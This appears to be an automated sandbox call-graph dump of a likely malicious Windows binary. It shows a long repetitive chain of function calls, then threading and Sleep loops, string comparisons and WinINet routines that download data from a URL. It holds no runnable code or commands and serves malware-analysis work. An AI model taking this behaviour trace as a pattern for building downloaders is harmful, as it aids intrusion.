17 API calls 26855->26856 26857 29d8265e 26856->26857 26858 29d84750 17 API calls 26857->26858 26859 29d82677 26858->26859 26860 29d84750 17 API calls 26859->26860 26861 29d82690 26860->26861 26862 29d84750 17 API calls 26861->26862 26863 29d826a9 26862->26863 26864 29d84750 17 API calls 26863->26864 26865 29d826c2 26864->26865 26866 29d84750 17 API calls 26865->26866 26867 29d826db 26866->26867 26868 29d84750 17 API calls 26867->26868 26869 29d826f4 26868->26869 26870 29d84750 17 API calls 26869->26870 26871 29d8270d 26870->26871 26872 29d84750 17 API calls 26871->26872 26873 29d82726 26872->26873 26874 29d84750 17 API calls 26873->26874 26875 29d8273f 26874->26875 26876 29d84750 17 API calls 26875->26876 26877 29d82758 26876->26877 26878 29d84750 
17 API calls 26877->26878 26879 29d82771 26878->26879 26880 29d84750 17 API calls 26879->26880 26881 29d8278a 26880->26881 26882 29d84750 17 API calls 26881->26882 26883 29d827a3 26882->26883 26884 29d84750 17 API calls 26883->26884 26885 29d827bc 26884->26885 26886 29d84750 17 API calls 26885->26886 26887 29d827d5 26886->26887 26888 29d84750 17 API calls 26887->26888 26889 29d827ee 26888->26889 26890 29d84750 17 API calls 26889->26890 26891 29d82807 26890->26891 26892 29d84750 17 API calls 26891->26892 26893 29d82820 26892->26893 26894 29d84750 17 API calls 26893->26894 26895 29d82839 26894->26895 26896 29d84750 17 API calls 26895->26896 26897 29d82852 26896->26897 26898 29d84750 17 API calls 26897->26898 26899 29d8286b 26898->26899 26900 29d84750 17 API calls 26899->26900 26901 29d82884 26900->26901 26902 29d84750 17 API calls 26901->26902 26903 29d8289d 26902->26903 26904 29d84750 17 API calls 26903->26904 26905 29d828b6 26904->26905 26906 29d84750 17 API calls 26905->26906 26907 29d828cf 26906->26907 26908 29d84750 17 API calls 26907->26908 26909 29d828e8 26908->26909 26910 29d84750 17 API calls 26909->26910 26911 29d82901 26910->26911 26912 29d84750 17 API calls 26911->26912 26913 29d8291a 26912->26913 26914 29d84750 17 API calls 26913->26914 26915 29d82933 26914->26915 26916 29d84750 17 API calls 26915->26916 26917 29d8294c 26916->26917 26918 29d84750 17 API calls 26917->26918 26919 29d82965 26918->26919 26920 29d84750 17 API calls 26919->26920 26921 29d8297e 26920->26921 26922 29d84750 17 API calls 26921->26922 26923 29d82997 26922->26923 26924 29d84750 17 API calls 26923->26924 26925 29d829b0 26924->26925 26926 29d84750 17 API calls 26925->26926 26927 29d829c9 26926->26927 26928 29d84750 17 API calls 26927->26928 26929 29d829e2 26928->26929 26930 29d84750 17 API calls 26929->26930 26931 29d829fb 26930->26931 26932 29d84750 17 API calls 26931->26932 26933 29d82a14 26932->26933 26934 29d84750 17 API calls 26933->26934 26935 29d82a2d 26934->26935 26936 
29d84750 17 API calls 26935->26936 26937 29d82a46 26936->26937 26938 29d84750 17 API calls 26937->26938 26939 29d82a5f 26938->26939 26940 29d84750 17 API calls 26939->26940 26941 29d82a78 26940->26941 26942 29d84750 17 API calls 26941->26942 26943 29d82a91 26942->26943 26944 29d84750 17 API calls 26943->26944 26945 29d82aaa 26944->26945 26946 29d84750 17 API calls 26945->26946 26947 29d82ac3 26946->26947 26948 29d84750 17 API calls 26947->26948 26949 29d82adc 26948->26949 26950 29d84750 17 API calls 26949->26950 26951 29d82af5 26950->26951 26952 29d84750 17 API calls 26951->26952 26953 29d82b0e 26952->26953 26954 29d84750 17 API calls 26953->26954 26955 29d82b27 26954->26955 26956 29d84750 17 API calls 26955->26956 26957 29d82b40 26956->26957 26958 29d84750 17 API calls 26957->26958 26959 29d82b59 26958->26959 26960 29d84750 17 API calls 26959->26960 26961 29d82b72 26960->26961 26962 29d84750 17 API calls 26961->26962 26963 29d82b8b 26962->26963 26964 29d84750 17 API calls 26963->26964 26965 29d82ba4 26964->26965 26966 29d84750 17 API calls 26965->26966 26967 29d82bbd 26966->26967 26968 29d84750 17 API calls 26967->26968 26969 29d82bd6 26968->26969 26970 29d84750 17 API calls 26969->26970 26971 29d82bef 26970->26971 26972 29d84750 17 API calls 26971->26972 26973 29d82c08 26972->26973 26974 29d84750 17 API calls 26973->26974 26975 29d82c21 26974->26975 26976 29d84750 17 API calls 26975->26976 26977 29d82c3a 26976->26977 26978 29d84750 17 API calls 26977->26978 26979 29d82c53 26978->26979 26980 29d84750 17 API calls 26979->26980 26981 29d82c6c 26980->26981 26982 29d84750 17 API calls 26981->26982 26983 29d82c85 26982->26983 26984 29d84750 17 API calls 26983->26984 26985 29d82c9e 26984->26985 26986 29d84750 17 API calls 26985->26986 26987 29d82cb7 26986->26987 26988 29d84750 17 API calls 26987->26988 26989 29d82cd0 26988->26989 26990 29d84750 17 API calls 26989->26990 26991 29d82ce9 26990->26991 26992 29d84750 17 API calls 26991->26992 26993 29d82d02 26992->26993 
26994 29d84750 17 API calls 26993->26994 26995 29d82d1b 26994->26995 26996 29d84750 17 API calls 26995->26996 26997 29d82d34 26996->26997 26998 29d84750 17 API calls 26997->26998 26999 29d82d4d 26998->26999 27000 29d84750 17 API calls 26999->27000 27001 29d82d66 27000->27001 27002 29d84750 17 API calls 27001->27002 27003 29d82d7f 27002->27003 27004 29d84750 17 API calls 27003->27004 27005 29d82d98 27004->27005 27006 29d84750 17 API calls 27005->27006 27007 29d82db1 27006->27007 27008 29d84750 17 API calls 27007->27008 27009 29d82dca 27008->27009 27010 29d84750 17 API calls 27009->27010 27011 29d82de3 27010->27011 27012 29d84750 17 API calls 27011->27012 27013 29d82dfc 27012->27013 27014 29d84750 17 API calls 27013->27014 27015 29d82e15 27014->27015 27016 29d84750 17 API calls 27015->27016 27017 29d82e2e 27016->27017 27018 29d84750 17 API calls 27017->27018 27019 29d82e47 27018->27019 27020 29d84750 17 API calls 27019->27020 27021 29d82e60 27020->27021 27022 29d84750 17 API calls 27021->27022 27023 29d82e79 27022->27023 27024 29d84750 17 API calls 27023->27024 27025 29d82e92 27024->27025 27026 29d84750 17 API calls 27025->27026 27027 29d82eab 27026->27027 27028 29d84750 17 API calls 27027->27028 27029 29d82ec4 27028->27029 27030 29d84750 17 API calls 27029->27030 27031 29d82edd 27030->27031 27032 29d84750 17 API calls 27031->27032 27033 29d82ef6 27032->27033 27034 29d84750 17 API calls 27033->27034 27035 29d82f0f 27034->27035 27036 29d84750 17 API calls 27035->27036 27037 29d82f28 27036->27037 27038 29d84750 17 API calls 27037->27038 27039 29d82f41 27038->27039 27040 29d84750 17 API calls 27039->27040 27041 29d82f5a 27040->27041 27042 29d84750 17 API calls 27041->27042 27043 29d82f73 27042->27043 27044 29d84750 17 API calls 27043->27044 27045 29d82f8c 27044->27045 27046 29d84750 17 API calls 27045->27046 27047 29d82fa5 27046->27047 27048 29d84750 17 API calls 27047->27048 27049 29d82fbe 27048->27049 27050 29d84750 17 API calls 27049->27050 27051 29d82fd7 
27050->27051 27052 29d84750 17 API calls 27051->27052 27053 29d82ff0 27052->27053 27054 29d84750 17 API calls 27053->27054 27055 29d83009 27054->27055 27056 29d84750 17 API calls 27055->27056 27057 29d83022 27056->27057 27058 29d84750 17 API calls 27057->27058 27059 29d8303b 27058->27059 27060 29d84750 17 API calls 27059->27060 27061 29d83054 27060->27061 27062 29d84750 17 API calls 27061->27062 27063 29d8306d 27062->27063 27064 29d84750 17 API calls 27063->27064 27065 29d83086 27064->27065 27066 29d84750 17 API calls 27065->27066 27067 29d8309f 27066->27067 27068 29d84750 17 API calls 27067->27068 27069 29d830b8 27068->27069 27070 29d84750 17 API calls 27069->27070 27071 29d830d1 27070->27071 27072 29d84750 17 API calls 27071->27072 27073 29d830ea 27072->27073 27074 29d84750 17 API calls 27073->27074 27075 29d83103 27074->27075 27076 29d84750 17 API calls 27075->27076 27077 29d8311c 27076->27077 27078 29d84750 17 API calls 27077->27078 27079 29d83135 27078->27079 27080 29d84750 17 API calls 27079->27080 27081 29d8314e 27080->27081 27082 29d84750 17 API calls 27081->27082 27083 29d83167 27082->27083 27084 29d84750 17 API calls 27083->27084 27085 29d83180 27084->27085 27086 29d84750 17 API calls 27085->27086 27087 29d83199 27086->27087 27088 29d84750 17 API calls 27087->27088 27089 29d831b2 27088->27089 27090 29d84750 17 API calls 27089->27090 27091 29d831cb 27090->27091 27092 29d84750 17 API calls 27091->27092 27093 29d831e4 27092->27093 27094 29d84750 17 API calls 27093->27094 27095 29d831fd 27094->27095 27096 29d84750 17 API calls 27095->27096 27097 29d83216 27096->27097 27098 29d84750 17 API calls 27097->27098 27099 29d8322f 27098->27099 27100 29d84750 17 API calls 27099->27100 27101 29d83248 27100->27101 27102 29d84750 17 API calls 27101->27102 27103 29d83261 27102->27103 27104 29d84750 17 API calls 27103->27104 27105 29d8327a 27104->27105 27106 29d84750 17 API calls 27105->27106 27107 29d83293 27106->27107 27108 29d84750 17 API calls 27107->27108 27109 
29d832ac 27108->27109 27110 29d84750 17 API calls 27109->27110 27111 29d832c5 27110->27111 27112 29d84750 17 API calls 27111->27112 27113 29d832de 27112->27113 27114 29d84750 17 API calls 27113->27114 27115 29d832f7 27114->27115 27116 29d84750 17 API calls 27115->27116 27117 29d83310 27116->27117 27118 29d84750 17 API calls 27117->27118 27119 29d83329 27118->27119 27120 29d84750 17 API calls 27119->27120 27121 29d83342 27120->27121 27122 29d84750 17 API calls 27121->27122 27123 29d8335b 27122->27123 27124 29d84750 17 API calls 27123->27124 27125 29d83374 27124->27125 27126 29d84750 17 API calls 27125->27126 27127 29d8338d 27126->27127 27128 29d84750 17 API calls 27127->27128 27129 29d833a6 27128->27129 27130 29d84750 17 API calls 27129->27130 27131 29d833bf 27130->27131 27132 29d84750 17 API calls 27131->27132 27133 29d833d8 27132->27133 27134 29d84750 17 API calls 27133->27134 27135 29d833f1 27134->27135 27136 29d84750 17 API calls 27135->27136 27137 29d8340a 27136->27137 27138 29d84750 17 API calls 27137->27138 27139 29d83423 27138->27139 27140 29d84750 17 API calls 27139->27140 27141 29d8343c 27140->27141 27142 29d84750 17 API calls 27141->27142 27143 29d83455 27142->27143 27144 29d84750 17 API calls 27143->27144 27145 29d8346e 27144->27145 27146 29d84750 17 API calls 27145->27146 27147 29d83487 27146->27147 27148 29d84750 17 API calls 27147->27148 27149 29d834a0 27148->27149 27150 29d84750 17 API calls 27149->27150 27151 29d834b9 27150->27151 27152 29d84750 17 API calls 27151->27152 27153 29d834d2 27152->27153 27154 29d84750 17 API calls 27153->27154 27155 29d834eb 27154->27155 27156 29d84750 17 API calls 27155->27156 27157 29d83504 27156->27157 27158 29d84750 17 API calls 27157->27158 27159 29d8351d 27158->27159 27160 29d84750 17 API calls 27159->27160 27161 29d83536 27160->27161 27162 29d84750 17 API calls 27161->27162 27163 29d8354f 27162->27163 27164 29d84750 17 API calls 27163->27164 27165 29d83568 27164->27165 27166 29d84750 17 API calls 27165->27166 
27167 29d83581 27166->27167 27168 29d84750 17 API calls 27167->27168 27169 29d8359a 27168->27169 27170 29d84750 17 API calls 27169->27170 27171 29d835b3 27170->27171 27172 29d84750 17 API calls 27171->27172 27173 29d835cc 27172->27173 27174 29d84750 17 API calls 27173->27174 27175 29d835e5 27174->27175 27176 29d84750 17 API calls 27175->27176 27177 29d835fe 27176->27177 27178 29d84750 17 API calls 27177->27178 27179 29d83617 27178->27179 27180 29d84750 17 API calls 27179->27180 27181 29d83630 27180->27181 27182 29d84750 17 API calls 27181->27182 27183 29d83649 27182->27183 27184 29d84750 17 API calls 27183->27184 27185 29d83662 27184->27185 27186 29d84750 17 API calls 27185->27186 27187 29d8367b 27186->27187 27188 29d84750 17 API calls 27187->27188 27189 29d83694 27188->27189 27190 29d84750 17 API calls 27189->27190 27191 29d836ad 27190->27191 27192 29d84750 17 API calls 27191->27192 27193 29d836c6 27192->27193 27194 29d84750 17 API calls 27193->27194 27195 29d836df 27194->27195 27196 29d84750 17 API calls 27195->27196 27197 29d836f8 27196->27197 27198 29d84750 17 API calls 27197->27198 27199 29d83711 27198->27199 27200 29d84750 17 API calls 27199->27200 27201 29d8372a 27200->27201 27202 29d84750 17 API calls 27201->27202 27203 29d83743 27202->27203 27204 29d84750 17 API calls 27203->27204 27205 29d8375c 27204->27205 27206 29d84750 17 API calls 27205->27206 27207 29d83775 27206->27207 27208 29d84750 17 API calls 27207->27208 27209 29d8378e 27208->27209 27210 29d84750 17 API calls 27209->27210 27211 29d837a7 27210->27211 27212 29d84750 17 API calls 27211->27212 27213 29d837c0 27212->27213 27214 29d84750 17 API calls 27213->27214 27215 29d837d9 27214->27215 27216 29d84750 17 API calls 27215->27216 27217 29d837f2 27216->27217 27218 29d84750 17 API calls 27217->27218 27219 29d8380b 27218->27219 27220 29d84750 17 API calls 27219->27220 27221 29d83824 27220->27221 27222 29d84750 17 API calls 27221->27222 27223 29d8383d 27222->27223 27224 29d84750 17 API calls 
27223->27224 27225 29d83856 27224->27225 27226 29d84750 17 API calls 27225->27226 27227 29d8386f 27226->27227 27228 29d84750 17 API calls 27227->27228 27229 29d83888 27228->27229 27230 29d84750 17 API calls 27229->27230 27231 29d838a1 27230->27231 27232 29d84750 17 API calls 27231->27232 27233 29d838ba 27232->27233 27234 29d84750 17 API calls 27233->27234 27235 29d838d3 27234->27235 27236 29d84750 17 API calls 27235->27236 27237 29d838ec 27236->27237 27238 29d84750 17 API calls 27237->27238 27239 29d83905 27238->27239 27240 29d84750 17 API calls 27239->27240 27241 29d8391e 27240->27241 27242 29d84750 17 API calls 27241->27242 27243 29d83937 27242->27243 27244 29d84750 17 API calls 27243->27244 27245 29d83950 27244->27245 27246 29d84750 17 API calls 27245->27246 27247 29d83969 27246->27247 27248 29d84750 17 API calls 27247->27248 27249 29d83982 27248->27249 27250 29d84750 17 API calls 27249->27250 27251 29d8399b 27250->27251 27252 29d84750 17 API calls 27251->27252 27253 29d839b4 27252->27253 27254 29d84750 17 API calls 27253->27254 27255 29d839cd 27254->27255 27256 29d84750 17 API calls 27255->27256 27257 29d839e6 27256->27257 27258 29d84750 17 API calls 27257->27258 27259 29d839ff 27258->27259 27260 29d84750 17 API calls 27259->27260 27261 29d83a18 27260->27261 27262 29d84750 17 API calls 27261->27262 27263 29d83a31 27262->27263 27264 29d84750 17 API calls 27263->27264 27265 29d83a4a 27264->27265 27266 29d84750 17 API calls 27265->27266 27267 29d83a63 27266->27267 27268 29d84750 17 API calls 27267->27268 27269 29d83a7c 27268->27269 27270 29d84750 17 API calls 27269->27270 27271 29d83a95 27270->27271 27272 29d84750 17 API calls 27271->27272 27273 29d83aae 27272->27273 27274 29d84750 17 API calls 27273->27274 27275 29d83ac7 27274->27275 27276 29d84750 17 API calls 27275->27276 27277 29d83ae0 27276->27277 27278 29d84750 17 API calls 27277->27278 27279 29d83af9 27278->27279 27280 29d84750 17 API calls 27279->27280 27281 29d83b12 27280->27281 27282 29d84750 17 API 
calls 27281->27282 27283 29d83b2b 27282->27283 27284 29d84750 17 API calls 27283->27284 27285 29d83b44 27284->27285 27286 29d84750 17 API calls 27285->27286 27287 29d83b5d 27286->27287 27288 29d84750 17 API calls 27287->27288 27289 29d83b76 27288->27289 27290 29d84750 17 API calls 27289->27290 27291 29d83b8f 27290->27291 27292 29d84750 17 API calls 27291->27292 27293 29d83ba8 27292->27293 27294 29d84750 17 API calls 27293->27294 27295 29d83bc1 27294->27295 27296 29d84750 17 API calls 27295->27296 27297 29d83bda 27296->27297 27298 29d84750 17 API calls 27297->27298 27299 29d83bf3 27298->27299 27300 29d84750 17 API calls 27299->27300 27301 29d83c0c 27300->27301 27302 29d84750 17 API calls 27301->27302 27303 29d83c25 27302->27303 27304 29d84750 17 API calls 27303->27304 27305 29d83c3e 27304->27305 27306 29d84750 17 API calls 27305->27306 27307 29d83c57 27306->27307 27308 29d84750 17 API calls 27307->27308 27309 29d83c70 27308->27309 27310 29d84750 17 API calls 27309->27310 27311 29d83c89 27310->27311 27312 29d84750 17 API calls 27311->27312 27313 29d83ca2 27312->27313 27314 29d84750 17 API calls 27313->27314 27315 29d83cbb 27314->27315 27316 29d84750 17 API calls 27315->27316 27317 29d83cd4 27316->27317 27318 29d84750 17 API calls 27317->27318 27319 29d83ced 27318->27319 27320 29d84750 17 API calls 27319->27320 27321 29d83d06 27320->27321 27322 29d84750 17 API calls 27321->27322 27323 29d83d1f 27322->27323 27324 29d84750 17 API calls 27323->27324 27325 29d83d38 27324->27325 27326 29d84750 17 API calls 27325->27326 27327 29d83d51 27326->27327 27328 29d84750 17 API calls 27327->27328 27329 29d83d6a 27328->27329 27330 29d84750 17 API calls 27329->27330 27331 29d83d83 27330->27331 27332 29d84750 17 API calls 27331->27332 27333 29d83d9c 27332->27333 27334 29d84750 17 API calls 27333->27334 27335 29d83db5 27334->27335 27336 29d84750 17 API calls 27335->27336 27337 29d83dce 27336->27337 27338 29d84750 17 API calls 27337->27338 27339 29d83de7 27338->27339 27340 29d84750 17 
API calls 27339->27340 27341 29d83e00 27340->27341 27342 29d84750 17 API calls 27341->27342 27343 29d83e19 27342->27343 27344 29d84750 17 API calls 27343->27344 27345 29d83e32 27344->27345 27346 29d84750 17 API calls 27345->27346 27347 29d83e4b 27346->27347 27348 29d84750 17 API calls 27347->27348 27349 29d83e64 27348->27349 27350 29d84750 17 API calls 27349->27350 27351 29d83e7d 27350->27351 27352 29d84750 17 API calls 27351->27352 27353 29d83e96 27352->27353 27354 29d84750 17 API calls 27353->27354 27355 29d83eaf 27354->27355 27356 29d84750 17 API calls 27355->27356 27357 29d83ec8 27356->27357 27358 29d84750 17 API calls 27357->27358 27359 29d83ee1 27358->27359 27360 29d84750 17 API calls 27359->27360 27361 29d83efa 27360->27361 27362 29d84750 17 API calls 27361->27362 27363 29d83f13 27362->27363 27364 29d84750 17 API calls 27363->27364 27365 29d83f2c 27364->27365 27366 29d84750 17 API calls 27365->27366 27367 29d83f45 27366->27367 27368 29d84750 17 API calls 27367->27368 27369 29d83f5e 27368->27369 27370 29d84750 17 API calls 27369->27370 27371 29d83f77 27370->27371 27372 29d84750 17 API calls 27371->27372 27373 29d83f90 27372->27373 27374 29d84750 17 API calls 27373->27374 27375 29d83fa9 27374->27375 27376 29d84750 17 API calls 27375->27376 27377 29d83fc2 27376->27377 27378 29d84750 17 API calls 27377->27378 27379 29d83fdb 27378->27379 27380 29d84750 17 API calls 27379->27380 27381 29d83ff4 27380->27381 27382 29d84750 17 API calls 27381->27382 27383 29d8400d 27382->27383 27384 29d84750 17 API calls 27383->27384 27385 29d84026 27384->27385 27386 29d84750 17 API calls 27385->27386 27387 29d8403f 27386->27387 27388 29d84750 17 API calls 27387->27388 27389 29d84058 27388->27389 27390 29d84750 17 API calls 27389->27390 27391 29d84071 27390->27391 27392 29d84750 17 API calls 27391->27392 27393 29d8408a 27392->27393 27394 29d84750 17 API calls 27393->27394 27395 29d840a3 27394->27395 27396 29d84750 17 API calls 27395->27396 27397 29d840bc 27396->27397 27398 29d84750 
17 API calls 27397->27398 27399 29d840d5 27398->27399 27400 29d84750 17 API calls 27399->27400 27401 29d840ee 27400->27401 27402 29d84750 17 API calls 27401->27402 27403 29d84107 27402->27403 27404 29d84750 17 API calls 27403->27404 27405 29d84120 27404->27405 27406 29d84750 17 API calls 27405->27406 27407 29d84139 27406->27407 27408 29d84750 17 API calls 27407->27408 27409 29d84152 27408->27409 27410 29d84750 17 API calls 27409->27410 27411 29d8416b 27410->27411 27412 29d84750 17 API calls 27411->27412 27413 29d84184 27412->27413 27414 29d84750 17 API calls 27413->27414 27415 29d8419d 27414->27415 27416 29d84750 17 API calls 27415->27416 27417 29d841b6 27416->27417 27418 29d84750 17 API calls 27417->27418 27419 29d841cf 27418->27419 27420 29d84750 17 API calls 27419->27420 27421 29d841e8 27420->27421 27422 29d84750 17 API calls 27421->27422 27423 29d84201 27422->27423 27424 29d84750 17 API calls 27423->27424 27425 29d8421a 27424->27425 27426 29d84750 17 API calls 27425->27426 27427 29d84233 27426->27427 27428 29d84750 17 API calls 27427->27428 27429 29d8424c 27428->27429 27430 29d84750 17 API calls 27429->27430 27431 29d84265 27430->27431 27432 29d84750 17 API calls 27431->27432 27433 29d8427e 27432->27433 27434 29d84750 17 API calls 27433->27434 27435 29d84297 27434->27435 27436 29d84750 17 API calls 27435->27436 27437 29d842b0 27436->27437 27438 29d84750 17 API calls 27437->27438 27439 29d842c9 27438->27439 27440 29d84750 17 API calls 27439->27440 27441 29d842e2 27440->27441 27442 29d84750 17 API calls 27441->27442 27443 29d842fb 27442->27443 27444 29d84750 17 API calls 27443->27444 27445 29d84314 27444->27445 27446 29d84750 17 API calls 27445->27446 27447 29d8432d 27446->27447 27448 29d84750 17 API calls 27447->27448 27449 29d84346 27448->27449 27450 29d84750 17 API calls 27449->27450 27451 29d8435f 27450->27451 27452 29d84750 17 API calls 27451->27452 27453 29d84378 27452->27453 27454 29d84750 17 API calls 27453->27454 27455 29d84391 27454->27455 27456 
29d84750 17 API calls 27455->27456 27457 29d843aa 27456->27457 27458 29d84750 17 API calls 27457->27458 27459 29d843c3 27458->27459 27460 29d84750 17 API calls 27459->27460 27461 29d843dc 27460->27461 27462 29d84750 17 API calls 27461->27462 27463 29d843f5 27462->27463 27464 29d84750 17 API calls 27463->27464 27465 29d8440e 27464->27465 27466 29d84750 17 API calls 27465->27466 27467 29d84427 27466->27467 27468 29d84750 17 API calls 27467->27468 27469 29d84440 27468->27469 27470 29d84750 17 API calls 27469->27470 27471 29d84459 27470->27471 27472 29d84750 17 API calls 27471->27472 27473 29d84472 27472->27473 27474 29d84750 17 API calls 27473->27474 27475 29d8448b 27474->27475 27476 29d84750 17 API calls 27475->27476 27477 29d844a4 27476->27477 27478 29d84750 17 API calls 27477->27478 27479 29d844bd 27478->27479 27480 29d84750 17 API calls 27479->27480 27481 29d844d6 27480->27481 27482 29d84750 17 API calls 27481->27482 27483 29d844ef 27482->27483 27484 29d84750 17 API calls 27483->27484 27485 29d84508 27484->27485 27486 29d84750 17 API calls 27485->27486 27487 29d84521 27486->27487 27488 29d84750 17 API calls 27487->27488 27489 29d8453a 27488->27489 27490 29d84750 17 API calls 27489->27490 27491 29d84553 27490->27491 27492 29d84750 17 API calls 27491->27492 27493 29d8456c 27492->27493 27494 29d84750 17 API calls 27493->27494 27495 29d84585 27494->27495 27496 29d84750 17 API calls 27495->27496 27497 29d8459e 27496->27497 27498 29d84750 17 API calls 27497->27498 27499 29d845b7 27498->27499 27500 29d84750 17 API calls 27499->27500 27501 29d845d0 27500->27501 27502 29d84750 17 API calls 27501->27502 27503 29d845e9 27502->27503 27504 29d84750 17 API calls 27503->27504 27505 29d84602 27504->27505 27506 29d84750 17 API calls 27505->27506 27507 29d8461b 27506->27507 27508 29d84750 17 API calls 27507->27508 27509 29d84634 27508->27509 27510 29d84750 17 API calls 27509->27510 27511 29d8464d 27510->27511 27512 29d84750 17 API calls 27511->27512 27513 29d84666 27512->27513 
calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 27742->27899 27900 29dad3b0 78 API calls 27743->27900 27746 29d94966 27747 29d9497a CryptBinaryToStringA 27746->27747 27748 29d949e0 CreateThread 27746->27748 27747->27748 27749 29d94999 GetProcessHeap HeapAlloc 27747->27749 27750 29d94a50 Sleep 27748->27750 27751 29d94a12 27748->27751 27749->27748 27752 29d949b4 _memset 27749->27752 27750->27750 27753 29d94a63 27750->27753 27751->27753 27754 29d94a1f CreateThread 27751->27754 27755 29d94a37 Sleep 27751->27755 27758 29d949c2 CryptBinaryToStringA 27752->27758 27901 29d81090 12 API calls 27753->27901 27754->27755 27755->27751 27759 29d94a4b 27755->27759 27757 29d94a68 27760 29d94f93 27757->27760 27761 29d892c0 77 API calls 27757->27761 27758->27748 27759->27750 27910 29da4e60 87 API calls 2 library calls 27760->27910 27763 29d94aa5 27761->27763 27765 29d892c0 77 API calls 27763->27765 27767 29d94acd 27765->27767 27769 29d892c0 77 API calls 27767->27769 27770 29d94af5 27769->27770 27771 29d892c0 77 API calls 27770->27771 27772 29d94b1d 27771->27772 27902 29d89980 77 API calls 27772->27902 27774 29d94b39 27903 29d89980 77 API calls 27774->27903 27776 29d94b54 27904 29d89980 77 API calls 27776->27904 27778 29d94b6f 27905 29da5230 90 API calls 2 library calls 27778->27905 27780 29d94b84 std::ios_base::_Tidy 27780->27760 27781 29d892c0 77 API calls 27780->27781 27782 29d94cd0 27781->27782 27783 29d892c0 77 API calls 27782->27783 27784 29d94cf8 27783->27784 27785 29d892c0 77 API calls 27784->27785 27786 29d94d20 27785->27786 27787 29d892c0 77 API calls 27786->27787 27788 29d94d48 27787->27788 27789 29d892c0 77 API calls 27788->27789 27790 29d94d70 27789->27790 27906 29d89980 77 API calls 27790->27906 27792 29d94d8c 27907 29d89980 77 API calls 27792->27907 27794 29d94da7 27908 29d89980 77 API calls 27794->27908 27796 29d94dc2 27909 29d89980 77 API calls 27796->27909 27798 29d94ddd std::ios_base::_Tidy 27799 29d94f5c CreateThread Sleep 27798->27799 27799->27760 
27911 29da4720 27800->27911 27802 29da2ed7 27802->27802 27803 29d892c0 77 API calls 27802->27803 27805 29da2f12 std::ios_base::_Tidy 27803->27805 27804 29dadf46 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 27806 29d9470a lstrcatA 27804->27806 27805->27804 27806->27711 27806->27712 27808 29db5640 _memset 27807->27808 27809 29d93e71 lstrcatA 27808->27809 27852 29d93e90 std::ios_base::_Tidy 27809->27852 27811 29d93f2d StrCmpCA 27811->27852 27812 29d93fe1 StrCmpCA 27813 29d94557 27812->27813 27812->27852 28071 29d8e9a0 77 API calls 27813->28071 27816 29d892c0 77 API calls 27816->27852 27817 29d8e8e0 77 API calls 27817->27852 27818 29d9456e std::ios_base::_Tidy 27820 29d8e910 77 API calls 27818->27820 27819 29d894c0 77 API calls 27819->27852 27860 29d94302 std::ios_base::_Tidy 27820->27860 27821 29d923b0 96 API calls 27821->27852 27822 29d925a0 115 API calls 27822->27852 27823 29d9408d StrCmpCA 27823->27852 27824 29d94141 StrCmpCA 27826 29d94503 27824->27826 27824->27852 27825 29dadf46 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 27827 29d945ed 27825->27827 28070 29d8e9a0 77 API calls 27826->28070 27866 29dad220 27827->27866 27829 29d8e910 77 API calls 27829->27852 27830 29d9451a std::ios_base::_Tidy 27831 29d8e910 77 API calls 27830->27831 27831->27813 27833 29d941dc StrCmpCA 27834 29d944bb 27833->27834 27833->27852 28066 29d8e9a0 77 API calls 27834->28066 27836 29d94202 StrCmpCA 27837 29d94467 27836->27837 27836->27852 28064 29d8e9d0 77 API calls 27837->28064 27838 29d94228 StrCmpCA 27840 29d943f4 27838->27840 27838->27852 28062 29d8ea00 77 API calls 27840->28062 27841 29d944c6 std::ios_base::_Tidy 28067 29d8e910 27841->28067 27842 29d9424e StrCmpCA 27845 29d94381 27842->27845 27842->27852 28060 29d8ea00 77 API calls 27845->28060 27847 29d94274 StrCmpCA 27850 29d9432d 27847->27850 27847->27852 27848 29d94472 std::ios_base::_Tidy 28065 29d8ea00 77 API calls 27848->28065 28058 29d8ea00 77 API calls 27850->28058 27851 29d9429a 
StrCmpCA 27855 29d942ba 27851->27855 27856 29d942aa Sleep 27851->27856 27852->27811 27852->27812 27852->27816 27852->27817 27852->27819 27852->27821 27852->27822 27852->27823 27852->27824 27852->27829 27852->27833 27852->27836 27852->27838 27852->27842 27852->27847 27852->27851 28051 29d8e8b0 27852->28051 28054 29d8e940 77 API calls 27852->28054 28055 29d8e970 77 API calls 27852->28055 27854 29d943ff std::ios_base::_Tidy 28063 29d8ea00 77 API calls 27854->28063 28056 29d8ea00 77 API calls 27855->28056 27856->27852 27858 29d9438c std::ios_base::_Tidy 28061 29d8ea00 77 API calls 27858->28061 27860->27825 27862 29d94338 std::ios_base::_Tidy 28059 29d8ea00 77 API calls 27862->28059 27864 29d942c5 std::ios_base::_Tidy 28057 29d8ea00 77 API calls 27864->28057 27867 29dae70e std::_Mutex::_Mutex 77 API calls 27866->27867 27868 29dad24f 27867->27868 28072 29dabec0 27868->28072 27870 29dad291 27871 29dad29a 27870->27871 27872 29dae70e std::_Mutex::_Mutex 77 API calls 27870->27872 27871->27720 27873 29dad2bd 27872->27873 27873->27720 27875 29d986ef _memset 27874->27875 27876 29d986fe lstrlenA InternetCrackUrlA 27875->27876 27877 29d98748 StrCmpCA 27876->27877 27878 29d98743 27876->27878 27879 29d98758 27877->27879 27880 29d9875b GetProcessHeap RtlAllocateHeap 27877->27880 27878->27877 27879->27880 27881 29d9877a 27880->27881 27882 29d9877d InternetOpenA InternetSetOptionA 27880->27882 27881->27882 27883 29d987b4 InternetOpenUrlA 27882->27883 27885 29d9883a InternetCloseHandle InternetCloseHandle 27883->27885 27886 29d987ea 27883->27886 27888 29d98854 std::ios_base::_Tidy 27885->27888 27886->27885 27887 29d987f0 InternetReadFile 27886->27887 27887->27885 27887->27886 27889 29dadf46 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 27888->27889 27890 29d94863 27889->27890 27891 29d8e3f0 87 API calls std::_Mutex::_Mutex 27890->27891 27891->27728 27892->27730 27893->27732 27894->27734 27895->27735 27896->27738 27897->27739 27898->27742 27899->27743 27900->27746 
